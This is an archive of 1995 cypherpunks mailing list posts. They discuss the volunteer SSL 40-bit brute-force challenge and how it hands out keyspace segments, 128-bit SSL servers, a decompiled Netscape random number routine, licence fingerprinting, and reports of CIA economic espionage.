Message-ID: <421dq7$rk4@marble.Britain.EU.net>
NNTP-Posting-Host: 193.119.26.63

We have now updated our servers to

a) Use 128 bit SSL if the client allows it.
b) Tell users which cipher is being used on a secure session.

To experiment point your secure client at one of the following:

https://193.118.187.101/
https://193.118.187.102/
https://193.118.187.105/
https://193.118.187.111/

(the main server does not run SSL to minimise PK calculations)

If you do not have a client that can use 128 bit RC4 then
ftp://193.119.26.70/mktnet/pub/horse.zip
does to the job, but is quite flaky otherwise.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Goedel@tezcat.com)
Date: Wed, 20 Sep 95 16:29:35 PDT
To: cypherpunks@toad.com
Subject: SSL SUGGESTIONS
Message-ID: <9509201546285327@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 1995 03:14:10 -0600
To: cypherpunks@toad.com
From: goedel@tezcat.com (Dietrich J. Kappe)
Subject: SSL Suggestions

-----BEGIN PGP SIGNED MESSAGE-----

Many people have suggested improvements to the techinical side of brutessl.
I don't think anyone has looked at the user interface side of things. A
simple configure script, and a few more reasonable defaults would bring
quite a few more volunteers. I know of at least a handful of people who did
not contribute because they were overwhelmed by the unfriendly scripts.

While a rough user interface could serve as a basic intelligence test, I
don't think that this sort of exclusion is necessary, given the nature of
the task.

DJK

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMEQrvHIf3YegbdiBAQE1pAJYnoXhffJeTrfiEm8R1fDGMuuZCpATw9gL
M+A+LawHiPFeoHtcHp3ZBkhzOqEFS6MfMJ1wjbt9e3ILSJkVGC71OrkpiNcDBMKY
0G9G
=3NIJ
-----END PGP SIGNATURE-----

Dietrich J. Kappe | Red Planet    http://www.redweb.com/
Red Planet, L.L.C.|         "Chess Space"              /chess
1-800-RED 0 WEB   |      "MS Access Products"          /cobre
Web Publishing    |        PGP Public Key              /goedel/key.txt







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 30 Aug 95 09:42:45 PDT
To: Piete.Brooks@cl.cam.ac.uk
Subject: Re: SSL brute/ng
Message-ID: <9508301633.AA22586@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > would they like to consider some sort of mirroring approach for the server
> > (at least on stats or updates/software)
> 
> Not sure what you mean ....

I think he wants to http to one of several machines to get the stats, each
of which contain a mirrored copy of the stats.  The cgi-bin script could
do a redirect to make this happen if you wanted.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Wed, 30 Aug 95 09:00:09 PDT
To: cypherpunks@toad.com
Subject: Re: Non-US SSL128 site
In-Reply-To: <199508301510.JAA11086@bert.cs.byu.edu>
Message-ID: <199508301559.JAA05610@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain


 
> a) Use 128 bit SSL if the client allows it.
> b) Tell users which cipher is being used on a secure session.

Interesting. When I connect, both from my Unix box at work and my Mac at
home, I'm told the connection is "40 bits RC4". I'm running Netscape 1.1.
I guess this makes sense, since if freely distributed clients were 128-bit
capable, then foreign users would still get 128-bit security when connecting
to U.S. servers.

Netscape's press release on the RC4-40 crack seems to have disappeared from
their home page, but I don't remember any specific mention of 128-bit
U.S.-only clients, just servers.

So what's up?

                                -- Will



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Tue, 29 Aug 95 17:24:53 PDT
To: sjb@austin.ibm.com (Scott Brickner)
Subject: Re: Florida Drivers Permits and a Hello
In-Reply-To: <9508291847.AA12145@ozymandias.austin.ibm.com>
Message-ID: <199508292315.AA20208@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>What possible value could the LEAs get by having your thumbprint digitally
>encoded on your driver's license?  It's not like the average cop-on-the-beat
>is qualified to lift a fingerprint and compare it.  Even if he was, how
>does it benefit that the fingerprint is on the license?

Here it is possible to walk into a suitably equipped police station, put your
fingertips on a sensor pad and a few seconds, if records exist, have the appear
on the computer screen. Extrapolating this it isnt a big step for a patrol
car, already equipped with a packet radio link to HQ and a data terminal,
scan in your fingerprint and check it. If the system was offline they could
easily take your rpint and compare it to that on your license. It's just a
little more proof that the license is linked to you.

Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 30 Aug 95 07:35:22 PDT
To: cypherpunks@toad.com
Subject: More Disintermediation
Message-ID: <199508301433.KAA04944@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


According to Monday's USA Today, the Customs Service has come up with a plan
to stop stopping international travelers arriving at US airports.
Apparently they can't afford "personal" service any more.  With 60 million
arrivals, Customs has decided to mingle a bit in luggage claim, look for
those meeting its profiles, and use drug- and food-sniffing dogs to catch
smugglers.

Note that international travel has doubled in the last few years.  What is
Customs (and La Migra) going to do when it doubles again.  It is much easier
for market phenomenons like this to double or triple than it is for
government agencies to double or triple.  

Markets scale well.  Governments don't.

DCF

"When foreigners steal 'our' jobs, our labor is freed for other tasks and
total world product increases.  Jobs can no more 'run out' than desire for
things in general can 'run out'."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Wed, 30 Aug 95 02:37:00 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Subject: ANNOUNCE: 2nd SSL challenge - we need your compute!
In-Reply-To: <199508241543.LAA07735@panix.com>
Message-ID: <Pine.SOL.3.91.950830103304.24824G-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Duncan Frissell wrote:

> The 32-bit Windows version does *not* work with my old Windows 3.11 even
> with the latest Microsoft 32-bit add in.

The Win32 client is multi-threaded.  Win32s doesn't support multi 
threading and has a whole host of other things missing too.  Win95 claims 
to support threads, although I heard "not many".


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Wed, 30 Aug 95 02:46:21 PDT
To: Joe Thomas <jthomas@access.digex.net>
Subject: Re: SSL CHALLENGE: Can't search with Win32 client!
In-Reply-To: <Pine.SUN.3.91.950824144329.9284B-100000@access5.digex.net>
Message-ID: <Pine.SOL.3.91.950830103622.24824H-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Joe Thomas wrote:

> I've got some keyspace, from various projects and test projects on the 
> server, but no matter what key range I select, I can't get the Search 
> button to be active (not greyed out).

The project must be of type "ssl" (look at the properties box to make 
sure).  ssl is the only search engine currently built in to the client, 
more will be added as challenges are planned.

Piete: I notice that you've renamed the original challenge to "sslold" 
and the test to "sslck" which causes the client to not recognise them!  
Any chance you can put them back to "ssl" so folks can test their clients?


Regards,

- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 30 Aug 95 08:17:04 PDT
To: cypherpunks@toad.com
Subject: Re: CIA & Espionage
In-Reply-To: <9508301246.AA14561@elysion.iaks.ira.uka.de>
Message-ID: <9508301516.AA32040@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>In a german weekly news magazine (Focus 34/1995, p. 178-181) I read an
>article about industrial espionage. It is said that the secret
>services have lost their main task when the east/west cold war had
>gone. Their new task is the industrial espionage. The russian, french,
>and american services were referenced in the article.

The cold war isn't so decisive. Much of espionage has always been industrial. It 
is an essential component of political espionage in any case. Millitary espionge 
may get the headlines but the bulk of the work is trawling through trade stats 
and various open networks in embassies etc.

In any case with the breakup of the USSR there are now more states to watch and 
because they are unstable more need to watch them.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Wed, 30 Aug 95 08:17:50 PDT
To: cypherpunks@toad.com
Subject: Re: Modern Journalism (was: All about Bernstein) (fwd)
Message-ID: <Pine.3.89.9508301119.A6002-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, folks, I thought I'd cc:ed this to the list.

---------- Forwarded message ----------
Date: Sun, 27 Aug 1995 20:08:22 +0059 (EDT)
From: Peter F Cassidy <pcassidy@world.std.com>
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Modern Journalism (was: All about Bernstein)



I agree. Some editors refuse to let actors be engaged as professionals
only. My philosophy is people's stories are their own and they are in
control of them to the extent they inform these stories. WIRED likes to
find crusaders and campaigners for their profiles. Sometimes they're not
the swashbuckling types that make for engaging personality pieces. That's
why I went for the issues around ITAR and a speculation on the case's
merits in relative case law and the judicial environment it will enter. 
DJB got eloquent where I thought it was important in terms of the
technology and research running up against a law that is itself full of
negotiable loopholes, quiet on everything else. Most everyone who's met
him tells me he's really retiring. Which lead me to conclude the guy might
have the kind of reserve and restraint required for protracted litigation
with the government which is essentially becomes an endurance contest.
Now, saying that, is it weird to think that people would be interested in
a fellow like that? Wrong?
	I've written about large scale bank frauds, organized crime,
charities frauds, etc. and even when I'm writing about gangsters, personal
detail isn't used for "spice" as much as it is narrative coherence. Who
introduced the arsonist to the drug dealer to do the condo deal? Is that
gossip or an essential detail? In science writing the personal detail
illuminates sometimes, not always, the actors involved in great discovery.
Is it prying to learn that Maslow felt better after he married his goofy
fourth cousin and came up with theory of the heirarchy of needs? No, but
it makes the story of the science more resonant. That's not a bad thing.
	There is undoubtedly a peoplemagazinification of journalism in 
the states which is why I gravitate toward the analytic or investigative 
publications like the Economist, Covert Action Quarterly or the Texas 
Observer, The Progressive and good trades like CIO. Yet even in these 
publications, the examination of protagonists is not considered out of 
bounds. I think it's not in your interest to be sniffing at the press. 
Tell them exactly what you wrote here and take these guys for a ride. 
Freeh has managed to make himself out to be this tower of virtue and 
civil leadership  -  well, up until recently and, you'll remember, led a 
successful charge for passage of the digital telephony bill which will be 
the model for crypto legislation, at least in terms of lobby tactics if 
not language. He did this partly by force of personality and his 
credibility. He didn't gain these by being precious about himself or his 
enterprise or, finally, by being a good cop or jurist. He did it with 
great PR and  a sense of how the press works, not by wingeing when an 
interview opportunity came around. 
-	Levy, if anything, is doing all cryptodom a favor if average 
schmucks pick up his book and say, gosh, is *that* what is at stake here? 
His NYT piece was clear and straightforward - engaged the science of 
crypto seriously and at the level of the reader could handle - and made 
the protagonists and antogonists accessible. Right now, crypto is not 
even on the map. Creating a barricade around the people that are driving 
this defining technology does no one any good. In fact, when it comes 
down to the end-game, legislating a ban on non-escrowed crypto, the first 
thing the Justice department will do is characterize you guys as amoral 
eggheads who are building technologies to hide the crimes of terrorists, 
rapists, genocidists and maniacs. At that point, I should think you would 
like to be appreciated as scientists with principles you act on in daily 
life and in your work, gosh, even personal philosophies, real personal stuff 
like that.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Wed, 30 Aug 95 11:32:59 PDT
To: cypherpunks@toad.com
Subject: Re: CIA & Espionage
Message-ID: <v02130503ac6a6e5a7a01@[157.22.240.11]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 AM 8/30/95, Dar Scott wrote:
>In responding to Hadmut John Young seems to have quoted IWR Daily
>Update in writing,
>>  UNITED STATES - CENTRAL INTELLIGENCE AGENCY (CIA)
>>
>>   President Clinton has ordered the CIA to make economic
>>espionage
>>   against our trade rivals a top priority. [sources: Los
>>Angeles Times-
>>   Washington, by James Risen, 7/23/95; Kyodo - Los Angeles,
>>7/23/95]
>
>Are we to assume both black and white?
>
>Will the CIA have access to escrowed keys in exported software?

Perhaps if economic espionage is such a high priority, then we'll have
to start using more secure keys in the future. After all, any international
corporation limited to using limited bit encryption schemes is just asking
for its rivals to start grabbing the traffic and stealing their information.

Jonathan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skapp@cix.compulink.co.uk (Stephen Kapp)
Date: Wed, 30 Aug 95 03:50:36 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape's RNG
Message-ID: <memo.573779@cix.compulink.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In-Reply-To: <199508300512.BAA23185@calum.csclub.uwaterloo.ca>
> -----8<-----8<-----
> struct RNG
> {
>     unsigned char md5bytes[0x10];
>     unsigned char randbytes[0x10];
>     int size;
>     void *md5data;
> };
> 
> RNG_GenerateRandomBytes(struct RNG *i0, char *i1, int i2)
> {
>     char buf[0x20];
>     int o1,o2;
> 
>     while (i2 > i0->size)
>     {
>       memcpy(i1, &(i0->randbytes)+0x10-i0->size, i0->size);
>       i1 += i0->size;
>       i2 -= io->size;
>       if (err = MD5_Begin(i0->md5data)) return err;
>       if (err = MD5_Update(i0->md5data, &(i0->md5bytes), 0x10)) return 
err;
>       if (err = MD5_End(i0->md5data, &(i0->randbytes), buf, 0x10)) 
return err;
>       i0->size = 0x10;
>       o2 = 0;
>       o1 = &(i0->md5bytes[0x0f]);
>       do
>       {
>           if ((*o1)++) break;
>           --o1;
>       } while (++o2 <= 0x0f);
>     }
> 
>     /* i2 <= i0->size */
>     memcpy(i1, &(i0->randbytes)+0x10-i0->size, i2);
>     i0->size -= i2;
>     return 0;
> }
> -----8<-----8<-----
> 

This looks very much like the RSAREF random number code, there are a few 
minor differences, but it still looks very similar.

--------------------------------------------------------------------------
-
E-mail: skapp@cix.compulink.co.uk, 
        skapp@sourcery.demon.co.uk
PGP fingerprint: 78 1C CD F4 A4 44 D2 CB  DD A5 CF EF F1 DD D8 6A
--------------------------------------------------------------------------
-
RSAEURO:        rsaeuro@sourcery.demon.co.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Wed, 30 Aug 95 11:02:56 PDT
To: cypherpunks@toad.com
Subject: Re: CIA & Espionage
Message-ID: <v01510100ac6a56311cf4@[198.59.115.111]>
MIME-Version: 1.0
Content-Type: text/plain


In responding to Hadmut John Young seems to have quoted IWR Daily
Update in writing,
>  UNITED STATES - CENTRAL INTELLIGENCE AGENCY (CIA)
>
>   President Clinton has ordered the CIA to make economic
>espionage
>   against our trade rivals a top priority. [sources: Los
>Angeles Times-
>   Washington, by James Risen, 7/23/95; Kyodo - Los Angeles,
>7/23/95]

Are we to assume both black and white?

Will the CIA have access to escrowed keys in exported software?

---Dar
(list newbie)


===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790  <---
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
My preference for attached files are in this order:
AOL, Mime, Binhex4, PGP, UUencode
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Wed, 30 Aug 95 11:14:55 PDT
To: ab411@detroit.freenet.org
Subject: Re: SSL search attacks
In-Reply-To: <199508301056.GAA26657@detroit.freenet.org>
Message-ID: <9508301813.AA12150@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


David R. Conrad writes
>Scott Brickner <sjb@austin.ibm.com> writes:
>>don@cs.byu.edu writes
>>>A random (instead
>>>of sequential) allocation _by the keyserver_ (out of unallocated 
>>>piecemeal segments) would also take some work to implement. 
>>
>>The problem is that it's irrelevant to the problem.  Random allocation
>>at the server is equivalent to simply "shuffling" the segments before
>>assignment, which doesn't affect the rate at which the space is searched.
>
>The point is that if J. Random Badguy knows that the key lies in segment
>0x1bad and wants to get this segment and send a false NAK for it, he can
>watch as key segments are doled out (perhaps with clients running on a
>number of machines) and when 0x1bad gets close, say, when 0x1b0b comes
>out, he can instruct all his clients to start hammering the server for
>all they're worth in an attempt to get the key segment assigned to one
>of his clients.
>
>If the segments are shuffled before they are handed out then this attack
>becomes impossible, since the attacker has no way of knowing when
>segment 0x1bad will be handed out.

An excellent point.  One I'd missed.  I agree that a random shuffle
of segments is appropriate.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 30 Aug 95 10:22:06 PDT
To: danisch@ira.uka.de
Subject: CIA & Espionage
Message-ID: <199508301721.NAA10401@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by danisch@ira.uka.de (Hadmut Danisch) on 
Wed, 30 Aug  2:46 PM


>It was said that Pres. Clinton had given a speech while 
>visiting the  CIA HQ in Langley/Virginia. He allegedly 
>said in this speech that obtaining  industrial 
>informations has the highest priority and this were the 
>new  task for the spies.
>
>Can anyone confirm the quotation?


Hadmut,


This is excerpted from:

     http://www.awpi.com/IntelWeb/IWR/Updates/2/181.html

----------

IWR Daily Update Vol. 2, No. 181

  JULY 24, 1995
  
     
_________________________________________________________________

   

  UNITED STATES - CENTRAL INTELLIGENCE AGENCY (CIA)
  
   President Clinton has ordered the CIA to make economic 
espionage
   against our trade rivals a top priority. [sources: Los 
Angeles Times-
   Washington, by James Risen, 7/23/95; Kyodo - Los Angeles, 
7/23/95]

  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Frissell@panix.com)
Date: Wed, 20 Sep 95 16:29:33 PDT
To: cypherpunks@toad.com
Subject: MORE DISINTERMEDIATION
Message-ID: <9509201546295337@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 1995 10:33:33 -0400
To: cypherpunks@toad.com
From: Duncan Frissell <frissell@panix.com>
Subject: More Disintermediation

According to Monday's USA Today, the Customs Service has come up with a plan
to stop stopping international travelers arriving at US airports.
Apparently they can't afford "personal" service any more.  With 60 million
arrivals, Customs has decided to mingle a bit in luggage claim, look for
those meeting its profiles, and use drug- and food-sniffing dogs to catch
smugglers.

Note that international travel has doubled in the last few years.  What is
Customs (and La Migra) going to do when it doubles again.  It is much easier
for market phenomenons like this to double or triple than it is for
government agencies to double or triple.  

Markets scale well.  Governments don't.

DCF

"When foreigners steal 'our' jobs, our labor is freed for other tasks and
total world product increases.  Jobs can no more 'run out' than desire for
things in general can 'run out'."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 30 Aug 95 05:49:53 PDT
To: cypherpunks@toad.com
Subject: CIA & Espionage
Message-ID: <9508301246.AA14561@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


In a german weekly news magazine (Focus 34/1995, p. 178-181) I read an
article about industrial espionage. It is said that the secret
services have lost their main task when the east/west cold war had
gone. Their new task is the industrial espionage. The russian, french,
and american services were referenced in the article.

It was said that Pres. Clinton had given a speech while visiting the
CIA HQ in Langley/Virginia. He allegedly said in this speech that obtaining
industrial informations has the highest priority and this were the new
task for the spies.

Can anyone confirm the quotation?

Hadmut






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 30 Aug 95 11:56:15 PDT
To: Hadmut Danisch <danisch@ira.uka.de>
Subject: Re: CIA & Espionage
In-Reply-To: <9508301246.AA14561@elysion.iaks.ira.uka.de>
Message-ID: <Pine.SUN.3.91.950830145316.6286B-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 30 Aug 1995, Hadmut Danisch wrote:

> Date: Wed, 30 Aug 1995 14:46:23 +0200
> From: Hadmut Danisch <danisch@ira.uka.de>
> To: cypherpunks@toad.com
> Subject: CIA & Espionage
> 
> In a german weekly news magazine (Focus 34/1995, p. 178-181) I read an
> article about industrial espionage. It is said that the secret
> services have lost their main task when the east/west cold war had
> gone. Their new task is the industrial espionage. The russian, french,
> and american services were referenced in the article.
> 
> It was said that Pres. Clinton had given a speech while visiting the
> CIA HQ in Langley/Virginia. He allegedly said in this speech that obtaining
> industrial informations has the highest priority and this were the new
> task for the spies.
> 
> Can anyone confirm the quotation?

Yes.

I've been told the same thing.  Moreover, I believe the quotation, not 
because of the source of confirmation, but because it fits right into the 
direction most of the intelligence agencies have been taking since the 
revelation that the French had won out a multi-billion $ contract for air 
traffic control because the French service had, through various espionage 
methods, determined the U.S. bidding position and such.

Sorry I can't give attributation for the confirmation.

> 
> Hadmut
> 
> 
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 30 Aug 95 11:58:37 PDT
To: Dar Scott <dsc@swcp.com>
Subject: Re: CIA & Espionage
In-Reply-To: <v01510100ac6a56311cf4@[198.59.115.111]>
Message-ID: <Pine.SUN.3.91.950830145814.6286C-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 30 Aug 1995, Dar Scott wrote:

> Date: Wed, 30 Aug 1995 12:02:48 -0600
> From: Dar Scott <dsc@swcp.com>
> To: cypherpunks@toad.com
> Subject: Re: CIA & Espionage
> 
> In responding to Hadmut John Young seems to have quoted IWR Daily
> Update in writing,
> >  UNITED STATES - CENTRAL INTELLIGENCE AGENCY (CIA)
> >
> >   President Clinton has ordered the CIA to make economic
> >espionage
> >   against our trade rivals a top priority. [sources: Los
> >Angeles Times-
> >   Washington, by James Risen, 7/23/95; Kyodo - Los Angeles,
> >7/23/95]
> 
> Are we to assume both black and white?
> 
> Will the CIA have access to escrowed keys in exported software?

Duh.

> 
> ---Dar
> (list newbie)
> 
> 
> ===========================================================
> Dar Scott               Home phone: +1 505 299 9497
> 
> Dar Scott Consulting         Voice: +1 505 299 5790  <---
> 8637 Horacio Place NE        Email: darscott@aol.com
> Albuquerque, NM  87111              dsc@swcp.com
>                                Fax: +1 505 898 6525
> http://www.swcp.com/~correspo/DSC/DarScott.html
> My preference for attached files are in this order:
> AOL, Mime, Binhex4, PGP, UUencode
> ===========================================================
> 
> 
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org (Hallam@w3.org)
Date: Wed, 20 Sep 95 16:37:02 PDT
To: cypherpunks@toad.com
Subject: Re: CIA & Espionage
Message-ID: <9509201546295340@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 95 11:16:01 -0400
From: hallam@w3.org


>In a german weekly news magazine (Focus 34/1995, p. 178-181) I read an
>article about industrial espionage. It is said that the secret
>services have lost their main task when the east/west cold war had
>gone. Their new task is the industrial espionage. The russian, french,
>and american services were referenced in the article.

The cold war isn't so decisive. Much of espionage has always been industrial. I
is an essential component of political espionage in any case. Millitary espiong
may get the headlines but the bulk of the work is trawling through trade stats 
and various open networks in embassies etc.

In any case with the breakup of the USSR there are now more states to watch and
because they are unstable more need to watch them.

        Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Wed, 30 Aug 95 14:49:03 PDT
To: cypherpunks@toad.com
Subject: Re: SSL search attack
Message-ID: <199508302142.PAA00178@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Scott Brickner <sjb@austin.ibm.com>
>>If the segments are shuffled before they are handed out then this attack
>>becomes impossible, since the attacker has no way of knowing when
>>segment 0x1bad will be handed out.
>
>An excellent point.  One I'd missed.  I agree that a random shuffle
>of segments is appropriate.

Problem is, though, if *each* segment is shuffled, or shuffled in groups
of 10 or 25 or 50 or what? brutessl is designed for sequential search
through a block of segments. I was pulling down blocks of up to 40 segments 
each, for each machine I was running. Of course, with brloop running I
won't be in such a bind (I have yet to see that it really works though..)
but still it also represents a coding problem as to handing out sequential
segments within shuffled blocks.

Hey, by the way Piete, is there gonna be a ego list (rankings) like there
was with the RC4? 

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMETbAMLa+QKZS485AQFU7QL/WTljlZyetr0x+L9eBJnrYUNNY1BHfTJn
C83wiJgPO5cpR6b/Vn8hYPnMRXnEhaxRJ062TcRitdngsUND1W+6d04Ph1gg/Qj8
US6FtoP+Yk9BhcYlYfogh3YSOxcgIvbu
=UiWq
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Wed, 30 Aug 95 08:20:32 PDT
To: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Subject: Re: SSL brute/ng
In-Reply-To: <Pine.3.89.9508292354.C13222-0100000@wane3.scri.fsu.edu>
Message-ID: <"swan.cl.cam.:068200:950830151949"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> If anyone is putting together a wish list of features for the next 
> iteration of the distributed brute

Sure am ....

> would they like to consider some sort of mirroring approach for the server
> (at least on stats or updates/software)

Not sure what you mean ....

Currently there are many machines involved ...

sksp		odd & sods.
sksp-ack	just ACKs.
sksp-key	just keyspace allocation
ftp		just FTPs
www		just WWW

stats are WWW only, with updates being done by ACKs machine.

> so that some of that traffic could be reduced?

How ?

> I'm afraid I am one of the guilty trying to log on to check on the stats at
> least once and I probably contributed to choking it just by doing that.

Nah ....

> If a local server

local to whom ?

Using a caching poxy ?

> could have been updated, it would save bandwidth on the server doing real
> work.

No -- different server.
 
> Could a trusted group of segemnt dolers be put together?

As in a hierarchy ?
This is being thought about ...

> I like the idea of running a benchmark type of program so that I could
> multiply keys/sec times the amount of time I had to donate, and only get a
> reasonable for me number of segments.

brloop does that for brutessl attempts ...

> I would hope that statistics be gathered on the number of keys tested, 
> elapsed time, etc. so that we all got some more or less real world 
> insight into key lengths and strengths, effort required to break, that we 
> have all heard so many projections about... especially as the doling gets 
> more sophisticated and the number of participants/cycle pool increases.

Let me know what stats you want ...

> Will there be Hal3?  

Yes.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 29 Aug 95 23:35:38 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits
In-Reply-To: <199508282255.AA46059@junkers.lochard.com.au>
Message-ID: <Pine.SUN.3.91.950830163405.10950W-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 29 Aug 1995, Mark wrote:

> I think the officer arresting you would frown if your license dumped a nudie
> picture of Cindy Crawford instead of your identification details.

"I have no idea how that happened, Officer - you know these things can't
 be forged!"

Nothing like sowing the seeds of doubt amongst those whose job it is to
enforce it...

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2DAA.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | D8 15 71 F9 26 C8 63 40  5E 63 5C 65 FC A0 22 99





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Wed, 30 Aug 95 15:03:32 PDT
To: don@cs.byu.edu
Subject: Re: SSL search attack
In-Reply-To: <199508302142.PAA00178@wero>
Message-ID: <9508302203.AA16891@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


don@cs.byu.edu writes
>From: Scott Brickner <sjb@austin.ibm.com>
>>>If the segments are shuffled before they are handed out then this attack
>>>becomes impossible, since the attacker has no way of knowing when
>>>segment 0x1bad will be handed out.
>>
>>An excellent point.  One I'd missed.  I agree that a random shuffle
>>of segments is appropriate.
>
>Problem is, though, if *each* segment is shuffled, or shuffled in groups
>of 10 or 25 or 50 or what? brutessl is designed for sequential search
>through a block of segments. I was pulling down blocks of up to 40 segments 
>each, for each machine I was running. Of course, with brloop running I
>won't be in such a bind (I have yet to see that it really works though..)
>but still it also represents a coding problem as to handing out sequential
>segments within shuffled blocks.

Well, the only real issue is that the requestor *not* be able to
reliably predict which segments will be assigned.  The server may adopt
a strategy of picking a random block of segments for each request.
This introduces a certain amount of fragmentation into the process, but
there are strategies to minimize this.  It may be enough to break up
keyspace into, say, 32 "regions", and fill requests sequentially, but
from a randomly selected region.




